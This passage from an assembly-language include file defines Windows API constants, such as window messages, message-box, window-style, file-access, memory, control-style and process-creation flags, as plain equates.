WM_GETTEXT equ 000Dh
|
||
WM_GETTEXTLENGTH equ 000Eh
|
||
WM_PAINT equ 000Fh
|
||
WM_CLOSE equ 0010h
|
||
WM_QUERYENDSESSION equ 0011h
|
||
WM_QUIT equ 0012h
|
||
WM_QUERYOPEN equ 0013h
|
||
WM_ERASEBKGND equ 0014h
|
||
WM_SYSCOLORCHANGE equ 0015h
|
||
WM_ENDSESSION equ 0016h
|
||
WM_SHOWWINDOW equ 0018h
|
||
WM_WININICHANGE equ 001Ah
|
||
WM_DEVMODECHANGE equ 001Bh
|
||
WM_ACTIVATEAPP equ 001Ch
|
||
WM_FONTCHANGE equ 001Dh
|
||
WM_TIMECHANGE equ 001Eh
|
||
WM_CANCELMODE equ 001Fh
|
||
WM_SETCURSOR equ 0020h
|
||
WM_MOUSEACTIVATE equ 0021h
|
||
WM_CHILDACTIVATE equ 0022h
|
||
WM_QUEUESYNC equ 0023h
|
||
WM_GETMINMAXINFO equ 0024h
|
||
WM_PAINTICON equ 0026h
|
||
WM_ICONERASEBKGND equ 0027h
|
||
WM_NEXTDLGCTL equ 0028h
|
||
WM_SPOOLERSTATUS equ 002Ah
|
||
WM_DRAWITEM equ 002Bh
|
||
WM_MEASUREITEM equ 002Ch
|
||
WM_DELETEITEM equ 002Dh
|
||
WM_VKEYTOITEM equ 002Eh
|
||
WM_CHARTOITEM equ 002Fh
|
||
WM_SETFONT equ 0030h
|
||
WM_GETFONT equ 0031h
|
||
WM_SETHOTKEY equ 0032h
|
||
WM_GETHOTKEY equ 0033h
|
||
WM_QUERYDRAGICON equ 0037h
|
||
WM_COMPAREITEM equ 0039h
|
||
WM_COMPACTING equ 0041h
|
||
WM_COMMNOTIFY equ 0044h ; /* no longer suported */
|
||
WM_WINDOWPOSCHANGING equ 0046h
|
||
WM_WINDOWPOSCHANGED equ 0047h
|
||
WM_POWER equ 0048h
|
||
WM_COPYDATA equ 004Ah
|
||
WM_CANCELJOURNAL equ 004Bh
|
||
WM_NOTIFY equ 004Eh
|
||
WM_INPUTLANGCHANGERequEST equ 0050h
|
||
WM_INPUTLANGCHANGE equ 0051h
|
||
WM_TCARD equ 0052h
|
||
WM_HELP equ 0053h
|
||
WM_USERCHANGED equ 0054h
|
||
WM_NOTIFYFORMAT equ 0055h
|
||
NFR_ANSI equ 1h
|
||
NFR_UNICODE equ 2h
|
||
NF_QUERY equ 3h
|
||
NF_RequERY equ 4h
|
||
WM_CONTEXTMENU equ 007Bh
|
||
WM_STYLECHANGING equ 007Ch
|
||
WM_STYLECHANGED equ 007Dh
|
||
WM_DISPLAYCHANGE equ 007Eh
|
||
WM_GETICON equ 007Fh
|
||
WM_SETICON equ 0080h
|
||
WM_NCCREATE equ 0081h
|
||
WM_NCDESTROY equ 0082h
|
||
WM_NCCALCSIZE equ 0083h
|
||
WM_NCHITTEST equ 0084h
|
||
WM_NCPAINT equ 0085h
|
||
WM_NCACTIVATE equ 0086h
|
||
WM_GETDLGCODE equ 0087h
|
||
WM_NCMOUSEMOVE equ 00A0h
|
||
WM_NCLBUTTONDOWN equ 00A1h
|
||
WM_NCLBUTTONUP equ 00A2h
|
||
WM_NCLBUTTONDBLCLK equ 00A3h
|
||
WM_NCRBUTTONDOWN equ 00A4h
|
||
WM_NCRBUTTONUP equ 00A5h
|
||
WM_NCRBUTTONDBLCLK equ 00A6h
|
||
WM_NCMBUTTONDOWN equ 00A7h
|
||
WM_NCMBUTTONUP equ 00A8h
|
||
WM_NCMBUTTONDBLCLK equ 00A9h
|
||
WM_KEYFIRST equ 0100h
|
||
WM_KEYDOWN equ 0100h
|
||
WM_KEYUP equ 0101h
|
||
WM_CHAR equ 0102h
|
||
WM_DEADCHAR equ 0103h
|
||
WM_SYSKEYDOWN equ 0104h
|
||
WM_SYSKEYUP equ 0105h
|
||
WM_SYSCHAR equ 0106h
|
||
WM_SYSDEADCHAR equ 0107h
|
||
WM_KEYLAST equ 0108h
|
||
WM_IME_STARTCOMPOSITION equ 010Dh
|
||
WM_IME_ENDCOMPOSITION equ 010Eh
|
||
WM_IME_COMPOSITION equ 010Fh
|
||
WM_IME_KEYLAST equ 010Fh
|
||
WM_INITDIALOG equ 0110h
|
||
WM_COMMAND equ 0111h
|
||
WM_SYSCOMMAND equ 0112h
|
||
WM_TIMER equ 0113h
|
||
WM_HSCROLL equ 0114h
|
||
WM_VSCROLL equ 0115h
|
||
WM_INITMENU equ 0116h
|
||
WM_INITMENUPOPUP equ 0117h
|
||
WM_MENUSELECT equ 011Fh
|
||
WM_MENUCHAR equ 0120h
|
||
WM_ENTERIDLE equ 0121h
|
||
WM_CTLCOLORMSGBOX equ 0132h
|
||
WM_CTLCOLOREDIT equ 0133h
|
||
WM_CTLCOLORLISTBOX equ 0134h
|
||
WM_CTLCOLORBTN equ 0135h
|
||
WM_CTLCOLORDLG equ 0136h
|
||
WM_CTLCOLORSCROLLBAR equ 0137h
|
||
WM_CTLCOLORSTATIC equ 0138h
|
||
WM_MOUSEFIRST equ 0200h
|
||
WM_MOUSEMOVE equ 0200h
|
||
WM_LBUTTONDOWN equ 0201h
|
||
WM_LBUTTONUP equ 0202h
|
||
WM_LBUTTONDBLCLK equ 0203h
|
||
WM_RBUTTONDOWN equ 0204h
|
||
WM_RBUTTONUP equ 0205h
|
||
WM_RBUTTONDBLCLK equ 0206h
|
||
WM_MBUTTONDOWN equ 0207h
|
||
WM_MBUTTONUP equ 0208h
|
||
WM_MBUTTONDBLCLK equ 0209h
|
||
WM_MOUSEWHEEL equ 020Ah
|
||
WM_PARENTNOTIFY equ 0210h
|
||
MENULOOP_WINDOW equ 0h
|
||
MENULOOP_POPUP equ 1h
|
||
WM_ENTERMENULOOP equ 0211h
|
||
WM_EXITMENULOOP equ 0212h
|
||
WM_SIZING equ 0214h
|
||
WM_CAPTURECHANGED equ 0215h
|
||
WM_MOVING equ 0216h
|
||
WM_POWERBROADCAST equ 0218h
|
||
WM_DEVICECHANGE equ 0219h
|
||
WM_IME_SETCONTEXT equ 0281h
|
||
WM_IME_NOTIFY equ 0282h
|
||
WM_IME_CONTROL equ 0283h
|
||
WM_IME_COMPOSITIONFULL equ 0284h
|
||
WM_IME_SELECT equ 0285h
|
||
WM_IME_CHAR equ 0286h
|
||
WM_IME_KEYDOWN equ 0290h
|
||
WM_IME_KEYUP equ 0291h
|
||
WM_MDICREATE equ 0220h
|
||
WM_MDIDESTROY equ 0221h
|
||
WM_MDIACTIVATE equ 0222h
|
||
WM_MDIRESTORE equ 0223h
|
||
WM_MDINEXT equ 0224h
|
||
WM_MDIMAXIMIZE equ 0225h
|
||
WM_MDITILE equ 0226h
|
||
WM_MDICASCADE equ 0227h
|
||
WM_MDIICONARRANGE equ 0228h
|
||
WM_MDIGETACTIVE equ 0229h
|
||
WM_MDISETMENU equ 0230h
|
||
WM_ENTERSIZEMOVE equ 0231h
|
||
WM_EXITSIZEMOVE equ 0232h
|
||
WM_DROPFILES equ 0233h
|
||
WM_MDIREFRESHMENU equ 0234h
|
||
WM_MOUSEHOVER equ 02A1h
|
||
WM_MOUSELEAVE equ 02A3h
|
||
WM_CUT equ 0300h
|
||
WM_COPY equ 0301h
|
||
WM_PASTE equ 0302h
|
||
WM_CLEAR equ 0303h
|
||
WM_UNDO equ 0304h
|
||
WM_RENDERFORMAT equ 0305h
|
||
WM_RENDERALLFORMATS equ 0306h
|
||
WM_DESTROYCLIPBOARD equ 0307h
|
||
WM_DRAWCLIPBOARD equ 0308h
|
||
WM_PAINTCLIPBOARD equ 0309h
|
||
WM_VSCROLLCLIPBOARD equ 030Ah
|
||
WM_SIZECLIPBOARD equ 030Bh
|
||
WM_ASKCBFORMATNAME equ 030Ch
|
||
WM_CHANGECBCHAIN equ 030Dh
|
||
WM_HSCROLLCLIPBOARD equ 030Eh
|
||
WM_QUERYNEWPALETTE equ 030Fh
|
||
WM_PALETTEISCHANGING equ 0310h
|
||
WM_PALETTECHANGED equ 0311h
|
||
WM_HOTKEY equ 0312h
|
||
WM_PRINT equ 0317h
|
||
WM_PRINTCLIENT equ 0318h
|
||
WM_HANDHELDFIRST equ 0358h
|
||
WM_HANDHELDLAST equ 035Fh
|
||
WM_AFXFIRST equ 0360h
|
||
WM_AFXLAST equ 037Fh
|
||
WM_PENWINFIRST equ 0380h
|
||
WM_PENWINLAST equ 038Fh
|
||
|
||
|
||
|
||
MB_OK equ 000000000h
|
||
MB_OKCANCEL equ 000000001h
|
||
MB_ABORTRETRYIGNORE equ 000000002h
|
||
MB_YESNOCANCEL equ 000000003h
|
||
MB_YESNO equ 000000004h
|
||
MB_RETRYCANCEL equ 000000005h
|
||
MB_TYPEMASK equ 00000000fh
|
||
MB_ICONHAND equ 000000010h
|
||
MB_ICONQUESTION equ 000000020h
|
||
MB_ICONEXCLAMATION equ 000000030h
|
||
MB_ICONASTERISK equ 000000040h
|
||
MB_ICONMASK equ 0000000f0h
|
||
MB_ICONINFORMATION equ 000000040h
|
||
MB_ICONSTOP equ 000000010h
|
||
MB_DEFBUTTON1 equ 000000000h
|
||
MB_DEFBUTTON2 equ 000000100h
|
||
MB_DEFBUTTON3 equ 000000200h
|
||
MB_DEFMASK equ 000000f00h
|
||
MB_APPLMODAL equ 000000000h
|
||
MB_SYSTEMMODAL equ 000001000h
|
||
MB_TASKMODAL equ 000002000h
|
||
MB_NOFOCUS equ 000008000h
|
||
IDNO equ 7
|
||
IDYES equ 6
|
||
IDCANCEL equ 2
|
||
SB_HORZ equ 0
|
||
SB_VERT equ 1
|
||
SB_CTL equ 2
|
||
SB_BOTH equ 3
|
||
SB_THUMBPOSITION equ 4
|
||
SB_ENDSCROLL equ 8
|
||
|
||
SW_HIDE equ 00h
|
||
SW_SHOWNORMAL equ 01h
|
||
SW_SHOWMINIMIZED equ 02h
|
||
SW_SHOWMAXIMIZED equ 03h
|
||
SW_SHOW equ 05h
|
||
SW_RESTORE equ 09h
|
||
SW_SHOWDEFAULT equ 0Ah
|
||
WM_USER equ 0400h
|
||
|
||
WS_POPUP equ 080000000h
|
||
WS_CHILD equ 040000000h
|
||
WS_MINIMIZE equ 020000000h
|
||
WS_VISIBLE equ 010000000h
|
||
WS_MAXIMIZE equ 001000000h
|
||
WS_CAPTION equ 000C00000h
|
||
WS_BORDER equ 000800000h
|
||
WS_DLGFRAME equ 000400000h
|
||
WS_VSCROLL equ 000200000h
|
||
WS_HSCROLL equ 000100000h
|
||
WS_SYSMENU equ 000080000h
|
||
;WS_SIZEBOX equ 000040000h
|
||
WS_MINIMIZEBOX equ 000020000h
|
||
WS_MAXIMIZEBOX equ 000010000h
|
||
WS_OVERLAPPEDWINDOW equ 000CF0000h
|
||
WS_EX_NOPARENTNOTIFY equ 000000004h
|
||
WS_EX_WINDOWEDGE equ 000000100h
|
||
WS_EX_CLIENTEDGE equ 000000200h
|
||
WS_EX_OVERLAPPEDWINDOW equ WS_EX_WINDOWEDGE + WS_EX_CLIENTEDGE
|
||
|
||
CS_VREDRAW equ 00001h
|
||
CS_HREDRAW equ 00002h
|
||
CS_PARENTDC equ 00080h
|
||
CS_BYTEALIGNWINDOW equ 02000h
|
||
|
||
BDR_RAISEDOUTER equ 01h
|
||
BDR_SUNKENOUTER equ 02h
|
||
BDR_RAISEDINNER equ 04h
|
||
BDR_SUNKENINNER equ 08h
|
||
EDGE_RAISED equ BDR_RAISEDOUTER + BDR_RAISEDINNER
|
||
EDGE_SUNKEN equ BDR_SUNKENOUTER + BDR_SUNKENINNER
|
||
EDGE_ETCHED equ BDR_SUNKENOUTER + BDR_RAISEDINNER
|
||
EDGE_BUMP equ BDR_RAISEDOUTER + BDR_SUNKENINNER
|
||
BF_LEFT equ 01h
|
||
BF_TOP equ 02h
|
||
BF_RIGHT equ 04h
|
||
BF_BOTTOM equ 08h
|
||
BF_RECT equ BF_LEFT + BF_TOP + BF_RIGHT + BF_BOTTOM
|
||
IDOK equ 1
|
||
IDCANCEL equ 2
|
||
IDABORT equ 3
|
||
IDRETRY equ 4
|
||
IDIGNORE equ 5
|
||
IDYES equ 6
|
||
IDNO equ 7
|
||
IDCLOSE equ 8
|
||
IDHELP equ 9
|
||
COLOR_BTNFACE equ 15
|
||
DLGWINDOWEXTRA equ 30
|
||
IDC_ARROW equ 32512
|
||
WM_CTLCOLORDLG equ 136h
|
||
WM_SETFOCUS equ 7
|
||
WM_KEYFIRST equ 0100h
|
||
WM_KEYDOWN equ 0100h
|
||
WM_KEYUP equ 0101h
|
||
WM_CHAR equ 0102h
|
||
WM_DEADCHAR equ 0103h
|
||
WM_SYSKEYDOWN equ 0104h
|
||
WM_SYSKEYUP equ 0105h
|
||
WM_SYSCHAR equ 0106h
|
||
WM_SYSDEADCHAR equ 0107h
|
||
WM_KEYLAST equ 0108h
|
||
WM_SETICON equ 80h
|
||
|
||
DS_3DLOOK equ 0004H
|
||
DS_FIXEDSYS equ 0008H
|
||
DS_NOFAILCREATE equ 0010H
|
||
DS_CONTROL equ 0400H
|
||
DS_CENTER equ 0800H
|
||
DS_CENTERMOUSE equ 1000H
|
||
DS_CONTEXTHELP equ 2000H
|
||
DS_ABSALIGN equ 01h
|
||
DS_SYSMODAL equ 02h
|
||
DS_LOCALEDIT equ 20h
|
||
DS_SETFONT equ 40h
|
||
DS_MODALFRAME equ 80h
|
||
DS_NOIDLEMSG equ 100h
|
||
DS_SETFOREGROUND equ 200h
|
||
|
||
FILE_FLAG_WRITE_THROUGH equ 80000000h
|
||
FILE_FLAG_OVERLAPPED equ 40000000h
|
||
FILE_FLAG_NO_BUFFERING equ 20000000h
|
||
FILE_FLAG_RANDOM_ACCESS equ 10000000h
|
||
FILE_FLAG_SequENTIAL_SCAN equ 08000000h
|
||
FILE_FLAG_DELETE_ON_CLOSE equ 04000000h
|
||
FILE_FLAG_BACKUP_SEMANTICS equ 02000000h
|
||
FILE_FLAG_POSIX_SEMANTICS equ 01000000h
|
||
|
||
CREATE_NEW equ 1
|
||
CREATE_ALWAYS equ 2
|
||
OPEN_EXISTING equ 3
|
||
OPEN_ALWAYS equ 4
|
||
TRUNCATE_EXISTING equ 5
|
||
|
||
GMEM_FIXED equ 0000h
|
||
GMEM_MOVEABLE equ 0002h
|
||
GMEM_NOCOMPACT equ 0010h
|
||
GMEM_NODISCARD equ 0020h
|
||
GMEM_ZEROINIT equ 0040h
|
||
GMEM_MODIFY equ 0080h
|
||
GMEM_DISCARDABLE equ 0100h
|
||
GMEM_NOT_BANKED equ 1000h
|
||
GMEM_SHARE equ 2000h
|
||
GMEM_DDESHARE equ 2000h
|
||
GMEM_NOTIFY equ 4000h
|
||
GMEM_LOWER equ GMEM_NOT_BANKED
|
||
GMEM_VALID_FLAGS equ 7F72h
|
||
GMEM_INVALID_HANDLE equ 8000h
|
||
|
||
|
||
LMEM_FIXED equ 0000h
|
||
LMEM_MOVEABLE equ 0002h
|
||
LMEM_NOCOMPACT equ 0010h
|
||
LMEM_NODISCARD equ 0020h
|
||
LMEM_ZEROINIT equ 0040h
|
||
LMEM_MODIFY equ 0080h
|
||
LMEM_DISCARDABLE equ 0F00h
|
||
LMEM_VALID_FLAGS equ 0F72h
|
||
LMEM_INVALID_HANDLE equ 8000h
|
||
|
||
LHND equ (LMEM_MOVEABLE or LMEM_ZEROINIT)
|
||
LPTR equ (LMEM_FIXED or LMEM_ZEROINIT)
|
||
|
||
NONZEROLHND equ (LMEM_MOVEABLE)
|
||
NONZEROLPTR equ (LMEM_FIXED)
|
||
LMEM_DISCARDED equ 4000h
|
||
LMEM_LOCKCOUNT equ 00FFh
|
||
DRIVE_UNKNOWN equ 0
|
||
DRIVE_NO_ROOT_DIR equ 1
|
||
DRIVE_REMOVABLE equ 2
|
||
DRIVE_FIXED equ 3
|
||
DRIVE_REMOTE equ 4
|
||
DRIVE_CDROM equ 5
|
||
DRIVE_RAMDISK equ 6
|
||
FILE_TYPE_UNKNOWN equ 0000h
|
||
FILE_TYPE_DISK equ 0001h
|
||
FILE_TYPE_CHAR equ 0002h
|
||
FILE_TYPE_PIPE equ 0003h
|
||
FILE_TYPE_REMOTE equ 8000h
|
||
|
||
;================================ WINNT.H ===============
|
||
FILE_READ_DATA equ ( 0001h )
|
||
FILE_LIST_DIRECTORY equ ( 0001h )
|
||
FILE_WRITE_DATA equ ( 0002h )
|
||
FILE_ADD_FILE equ ( 0002h )
|
||
FILE_APPEND_DATA equ ( 0004h )
|
||
FILE_ADD_SUBDIRECTORY equ ( 0004h )
|
||
FILE_CREATE_PIPE_INSTANCE equ ( 0004h )
|
||
FILE_READ_EA equ ( 0008h )
|
||
FILE_WRITE_EA equ ( 0010h )
|
||
FILE_EXECUTE equ ( 0020h )
|
||
FILE_TRAVERSE equ ( 0020h )
|
||
FILE_DELETE_CHILD equ ( 0040h )
|
||
FILE_READ_ATTRIBUTES equ ( 0080h )
|
||
FILE_WRITE_ATTRIBUTES equ ( 0100h )
|
||
|
||
;FILE_ALL_ACCESS equ (STANDARD_RIGHTS_RequIRED or SYNCHRONIZE or 1FFh)
|
||
;FILE_GENERIC_READ equ (STANDARD_RIGHTS_READ or FILE_READ_DATA or FILE_READ_ATTRIBUTES or FILE_READ_EA or SYNCHRONIZE)
|
||
;FILE_GENERIC_WRITE equ (STANDARD_RIGHTS_WRITE or FILE_WRITE_DATA or FILE_WRITE_ATTRIBUTES or FILE_WRITE_EA or FILE_APPEND_DATA or SYNCHRONIZE)
|
||
;FILE_GENERIC_EXECUTE equ (STANDARD_RIGHTS_EXECUTE or FILE_READ_ATTRIBUTES or FILE_EXECUTE or SYNCHRONIZE)
|
||
|
||
FILE_SHARE_READ equ 00000001h
|
||
FILE_SHARE_WRITE equ 00000002h
|
||
FILE_SHARE_DELETE equ 00000004h
|
||
FILE_ATTRIBUTE_READONLY equ 00000001h
|
||
FILE_ATTRIBUTE_HIDDEN equ 00000002h
|
||
FILE_ATTRIBUTE_SYSTEM equ 00000004h
|
||
FILE_ATTRIBUTE_DIRECTORY equ 00000010h
|
||
FILE_ATTRIBUTE_ARCHIVE equ 00000020h
|
||
FILE_ATTRIBUTE_NORMAL equ 00000080h
|
||
FILE_ATTRIBUTE_TEMPORARY equ 00000100h
|
||
FILE_ATTRIBUTE_COMPRESSED equ 00000800h
|
||
FILE_ATTRIBUTE_OFFLINE equ 00001000h
|
||
FILE_NOTIFY_CHANGE_FILE_NAME equ 00000001h
|
||
FILE_NOTIFY_CHANGE_DIR_NAME equ 00000002h
|
||
FILE_NOTIFY_CHANGE_ATTRIBUTES equ 00000004h
|
||
FILE_NOTIFY_CHANGE_SIZE equ 00000008h
|
||
FILE_NOTIFY_CHANGE_LAST_WRITE equ 00000010h
|
||
FILE_NOTIFY_CHANGE_LAST_ACCESS equ 00000020h
|
||
FILE_NOTIFY_CHANGE_CREATION equ 00000040h
|
||
FILE_NOTIFY_CHANGE_SECURITY equ 00000100h
|
||
FILE_ACTION_ADDED equ 00000001h
|
||
FILE_ACTION_REMOVED equ 00000002h
|
||
FILE_ACTION_MODIFIED equ 00000003h
|
||
FILE_ACTION_RENAMED_OLD_NAME equ 00000004h
|
||
FILE_ACTION_RENAMED_NEW_NAME equ 00000005h
|
||
FILE_CASE_SENSITIVE_SEARCH equ 00000001h
|
||
FILE_CASE_PRESERVED_NAMES equ 00000002h
|
||
FILE_UNICODE_ON_DISK equ 00000004h
|
||
FILE_PERSISTENT_ACLS equ 00000008h
|
||
FILE_FILE_COMPRESSION equ 00000010h
|
||
FILE_VOLUME_IS_COMPRESSED equ 00008000h
|
||
GENERIC_READ equ 80000000h
|
||
GENERIC_WRITE equ 40000000h
|
||
GENERIC_EXECUTE equ 20000000h
|
||
GENERIC_ALL equ 10000000h
|
||
|
||
DELETE equ 00010000h
|
||
READ_CONTROL equ 00020000h
|
||
WRITE_DAC equ 00040000h
|
||
WRITE_OWNER equ 00080000h
|
||
SYNCHRONIZE equ 00100000h
|
||
STANDARD_RIGHTS_RequIRED equ 000F0000h
|
||
STANDARD_RIGHTS_READ equ READ_CONTROL
|
||
STANDARD_RIGHTS_WRITE equ READ_CONTROL
|
||
STANDARD_RIGHTS_EXECUTE equ READ_CONTROL
|
||
STANDARD_RIGHTS_ALL equ 001F0000h
|
||
SPECIFIC_RIGHTS_ALL equ 0000FFFFh
|
||
|
||
FILE_BEGIN equ 0
|
||
FILE_CURRENT equ 1
|
||
FILE_END equ 2
|
||
|
||
ES_LEFT equ 0000h
|
||
ES_CENTER equ 0001h
|
||
ES_RIGHT equ 0002h
|
||
ES_MULTILINE equ 0004h
|
||
ES_UPPERCASE equ 0008h
|
||
ES_LOWERCASE equ 0010h
|
||
ES_PASSWORD equ 0020h
|
||
ES_AUTOVSCROLL equ 0040h
|
||
ES_AUTOHSCROLL equ 0080h
|
||
ES_NOHIDESEL equ 0100h
|
||
ES_OEMCONVERT equ 0400h
|
||
ES_READONLY equ 0800h
|
||
ES_WANTRETURN equ 1000h
|
||
EN_SETFOCUS equ 0100h
|
||
EN_KILLFOCUS equ 0200h
|
||
EN_CHANGE equ 0300h
|
||
EN_UPDATE equ 0400h
|
||
EN_ERRSPACE equ 0500h
|
||
EN_MAXTEXT equ 0501h
|
||
EN_HSCROLL equ 0601h
|
||
EN_VSCROLL equ 0602h
|
||
EC_LEFTMARGIN equ 0001h
|
||
EC_RIGHTMARGIN equ 0002h
|
||
EC_USEFONTINFO equ 0ffffh
|
||
EM_GETSEL equ 00B0h
|
||
EM_SETSEL equ 00B1h
|
||
EM_GETRECT equ 00B2h
|
||
EM_SETRECT equ 00B3h
|
||
EM_SETRECTNP equ 00B4h
|
||
EM_SCROLL equ 00B5h
|
||
EM_LINESCROLL equ 00B6h
|
||
EM_SCROLLCARET equ 00B7h
|
||
EM_GETMODIFY equ 00B8h
|
||
EM_SETMODIFY equ 00B9h
|
||
EM_GETLINECOUNT equ 00BAh
|
||
EM_LINEINDEX equ 00BBh
|
||
EM_SETHANDLE equ 00BCh
|
||
EM_GETHANDLE equ 00BDh
|
||
EM_GETTHUMB equ 00BEh
|
||
EM_LINELENGTH equ 00C1h
|
||
EM_REPLACESEL equ 00C2h
|
||
EM_GETLINE equ 00C4h
|
||
EM_LIMITTEXT equ 00C5h
|
||
EM_CANUNDO equ 00C6h
|
||
EM_UNDO equ 00C7h
|
||
EM_FMTLINES equ 00C8h
|
||
EM_LINEFROMCHAR equ 00C9h
|
||
EM_SETTABSTOPS equ 00CBh
|
||
EM_SETPASSWORDCHAR equ 00CCh
|
||
EM_EMPTYUNDOBUFFER equ 00CDh
|
||
EM_GETFIRSTVISIBLELINE equ 00CEh
|
||
EM_SETREADONLY equ 00CFh
|
||
EM_SETWORDBREAKPROC equ 00D0h
|
||
EM_GETWORDBREAKPROC equ 00D1h
|
||
EM_GETPASSWORDCHAR equ 00D2h
|
||
EM_SETMARGINS equ 00D3h
|
||
EM_GETMARGINS equ 00D4
|
||
EM_SETLIMITTEXT equ EM_LIMITTEXT
|
||
EM_GETLIMITTEXT equ 00D5h
|
||
EM_POSFROMCHAR equ 00D6h
|
||
EM_CHARFROMPOS equ 00D7h
|
||
WB_LEFT equ 0
|
||
WB_RIGHT equ 1
|
||
WB_ISDELIMITER equ 2
|
||
BS_PUSHBUTTON equ 00000000h
|
||
BS_DEFPUSHBUTTON equ 00000001h
|
||
BS_CHECKBOX equ 00000002h
|
||
BS_AUTOCHECKBOX equ 00000003h
|
||
BS_RADIOBUTTON equ 00000004h
|
||
BS_3STATE equ 00000005h
|
||
BS_AUTO3STATE equ 00000006h
|
||
BS_GROUPBOX equ 00000007h
|
||
BS_USERBUTTON equ 00000008h
|
||
BS_AUTORADIOBUTTON equ 00000009h
|
||
BS_OWNERDRAW equ 0000000Bh
|
||
BS_LEFTTEXT equ 00000020h
|
||
BS_TEXT equ 00000000h
|
||
BS_ICON equ 00000040h
|
||
BS_BITMAP equ 00000080h
|
||
BS_LEFT equ 00000100h
|
||
BS_RIGHT equ 00000200h
|
||
BS_CENTER equ 00000300h
|
||
BS_TOP equ 00000400h
|
||
BS_BOTTOM equ 00000800h
|
||
BS_VCENTER equ 00000C00h
|
||
BS_PUSHLIKE equ 00001000h
|
||
BS_MULTILINE equ 00002000h
|
||
BS_NOTIFY equ 00004000h
|
||
BS_FLAT equ 00008000h
|
||
BS_RIGHTBUTTON equ BS_LEFTTEXT
|
||
BN_CLICKED equ 0
|
||
BN_PAINT equ 1
|
||
BN_HILITE equ 2
|
||
BN_UNHILITE equ 3
|
||
BN_DISABLE equ 4
|
||
BN_DOUBLECLICKED equ 5
|
||
BN_PUSHED equ BN_HILITE
|
||
BN_UNPUSHED equ BN_UNHILITE
|
||
BN_DBLCLK equ BN_DOUBLECLICKED
|
||
BN_SETFOCUS equ 6
|
||
BN_KILLFOCUS equ 7
|
||
BM_GETCHECK equ 00F0h
|
||
BM_SETCHECK equ 00F1h
|
||
BM_GETSTATE equ 00F2h
|
||
BM_SETSTATE equ 00F3h
|
||
BM_SETSTYLE equ 00F4h
|
||
BM_CLICK equ 00F5h
|
||
BM_GETIMAGE equ 00F6h
|
||
BM_SETIMAGE equ 00F7h
|
||
BST_UNCHECKED equ 0000h
|
||
BST_CHECKED equ 0001h
|
||
BST_INDETERMINATE equ 0002h
|
||
BST_PUSHED equ 0004h
|
||
BST_FOCUS equ 0008h
|
||
SS_LEFT equ 00000000h
|
||
SS_CENTER equ 00000001h
|
||
SS_RIGHT equ 00000002h
|
||
SS_ICON equ 00000003h
|
||
SS_BLACKRECT equ 00000004h
|
||
SS_GRAYRECT equ 00000005h
|
||
SS_WHITERECT equ 00000006h
|
||
SS_BLACKFRAME equ 00000007h
|
||
SS_GRAYFRAME equ 00000008h
|
||
SS_WHITEFRAME equ 00000009h
|
||
SS_USERITEM equ 0000000Ah
|
||
SS_SIMPLE equ 0000000Bh
|
||
SS_LEFTNOWORDWRAP equ 0000000Ch
|
||
SS_OWNERDRAW equ 0000000Dh
|
||
SS_BITMAP equ 0000000Eh
|
||
SS_ENHMETAFILE equ 0000000Fh
|
||
SS_ETCHEDHORZ equ 00000010h
|
||
SS_ETCHEDVERT equ 00000011h
|
||
SS_ETCHEDFRAME equ 00000012h
|
||
SS_TYPEMASK equ 0000001Fh
|
||
SS_NOTIFY equ 00000100h
|
||
SS_CENTERIMAGE equ 00000200h
|
||
SS_RIGHTJUST equ 00000400h
|
||
SS_REALSIZEIMAGE equ 00000800h
|
||
SS_SUNKEN equ 00001000h
|
||
SS_ENDELLIPSIS equ 00004000h
|
||
SS_PATHELLIPSIS equ 00008000h
|
||
SS_WORDELLIPSIS equ 0000C000h
|
||
SS_ELLIPSISMASK equ 0000C000h
|
||
|
||
CDN_FIRST equ (0-601)
|
||
CDN_LAST equ (0-699)
|
||
OFN_READONLY equ 00000001h
|
||
OFN_OVERWRITEPROMPT equ 00000002h
|
||
OFN_HIDEREADONLY equ 00000004h
|
||
OFN_NOCHANGEDIR equ 00000008h
|
||
OFN_SHOWHELP equ 00000010h
|
||
OFN_ENABLEHOOK equ 00000020h
|
||
OFN_ENABLETEMPLATE equ 00000040h
|
||
OFN_ENABLETEMPLATEHANDLE equ 00000080h
|
||
OFN_NOVALIDATE equ 00000100h
|
||
OFN_ALLOWMULTISELECT equ 00000200h
|
||
OFN_EXTENSIONDIFFERENT equ 00000400h
|
||
OFN_PATHMUSTEXIST equ 00000800h
|
||
OFN_FILEMUSTEXIST equ 00001000h
|
||
OFN_CREATEPROMPT equ 00002000h
|
||
OFN_SHAREAWARE equ 00004000h
|
||
OFN_NOREADONLYRETURN equ 00008000h
|
||
OFN_NOTESTFILECREATE equ 00010000h
|
||
OFN_NONETWORKBUTTON equ 00020000h
|
||
OFN_NOLONGNAMES equ 00040000h
|
||
OFN_EXPLORER equ 00080000h
|
||
OFN_NODEREFERENCELINKS equ 00100000h
|
||
OFN_LONGNAMES equ 00200000h
|
||
OFN_SHAREFALLTHROUGH equ 2
|
||
OFN_SHARENOWARN equ 1
|
||
OFN_SHAREWARN equ 0
|
||
CDN_INITDONE equ (CDN_FIRST - 0000)
|
||
CDN_SELCHANGE equ (CDN_FIRST - 0001)
|
||
CDN_FOLDERCHANGE equ (CDN_FIRST - 0002)
|
||
CDN_SHAREVIOLATION equ (CDN_FIRST - 0003)
|
||
CDN_HELP equ (CDN_FIRST - 0004)
|
||
CDN_FILEOK equ (CDN_FIRST - 0005)
|
||
CDN_TYPECHANGE equ (CDN_FIRST - 0006)
|
||
|
||
DEBUG_PROCESS equ 00000001h
|
||
DEBUG_ONLY_THIS_PROCESS equ 00000002h
|
||
CREATE_SUSPENDED equ 00000004h
|
||
DETACHED_PROCESS equ 00000008h
|
||
CREATE_NEW_CONSOLE equ 00000010h
|
||
NORMAL_PRIORITY_CLASS equ 00000020h
|
||
IDLE_PRIORITY_CLASS equ 00000040h
|
||
HIGH_PRIORITY_CLASS equ 00000080h
|
||
REALTIME_PRIORITY_CLASS equ 00000100h
|
||
CREATE_NEW_PROCESS_GROUP equ 00000200h
|
||
CREATE_UNICODE_ENVIRONMENT equ 00000400h
|
||
CREATE_SEPARATE_WOW_VDM equ 00000800h
|
||
CREATE_SHARED_WOW_VDM equ 00001000h
|
||
CREATE_FORCEDOS equ 00002000h
|
||
CREATE_DEFAULT_ERROR_MODE equ 04000000h
|
||
CREATE_NO_WINDOW equ 08000000h
|
||
PROFILE_USER equ 10000000h
|
||
PROFILE_KERNEL equ 20000000h
|
||
PROFILE_SERVER equ 40000000h
|
||
|
||
MAXLONGLONG equ (7fffffffffffffffh)
|
||
MAXLONG equ 7fffffffh
|
||
MAXBYTE equ 0ffh
|
||
MAXWORD equ 0ffffh
|
||
MAXDWORD equ 0ffffffffh
|
||
MINCHAR equ 80h
|
||
MAXCHAR equ 07fh
|
||
